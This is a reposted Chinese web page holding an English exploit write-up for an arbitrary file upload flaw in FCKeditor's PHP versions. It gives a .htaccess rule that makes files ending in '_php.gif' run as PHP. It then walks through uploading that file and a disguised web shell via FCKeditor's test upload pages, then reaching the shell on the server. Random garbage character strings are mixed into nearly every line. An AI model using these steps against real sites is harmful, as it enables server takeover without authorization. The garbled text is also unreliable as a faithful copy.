FCKeditor所有php版本Upload上传漏洞
5 R) r. {. Z/ N8 o4 I. A. l作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:070 q) _( ~) G' f; J- J7 v
减小字体 增大字体
% }1 O& c& p9 K5 u0 M3 d[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability* O: W J! ?: ~' j3 F
[+] Date: 20119 P" [! l( ]/ y/ J( c C( P/ d
[+] Author : sinesafe.cn
% C$ l" M2 a- ][+] Website : WwW.sinesafe.cn
" [1 l ~8 d$ Z* T9 c———————————————————# L3 @( F6 {" b9 _ ^# f8 `
1.create a htaccess file:
' r2 u8 {/ F$ s: p# U# Dcode:; B" |* ^8 r7 d3 c2 `
<FilesMatch “_php.gif”>5 U) m" a7 \: ` j
SetHandler application/x-httpd-php
* Q1 u; S% E- m3 U" S</FilesMatch>% U5 o) }" a3 Y$ a% R* a+ k0 W
1 R0 I" M- {1 j
2.Now upload this htaccess with FCKeditor.: |2 M& ]' B6 o
- d# @5 X1 L0 T9 ehttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html9 i' Z: }/ z7 P0 ^! E: W% [- H% T
' ?( U7 M3 V+ b8 @% Zhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
* |" o0 K1 a" j# B) r* K9 \2 y. \, @, V' C0 [3 e3 ~
———————————————————————————————-, B' s1 V K1 ?" D, R5 W8 a
3.Now upload shell.php.gif with FCKeditor.
$ a/ K" g7 e: n B$ N4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
1 q: k- X0 I& J& y5.http://www.sinesafe.cn/anything/shell_php.gif( q; [# p* B. K% k# y) t
6.Now shell is available from server. | % k0 l/ s1 g- Q) t. L
* `) B- ~) P- x3 F5 b
J) a- w( {% J2 H, T6 {: s
|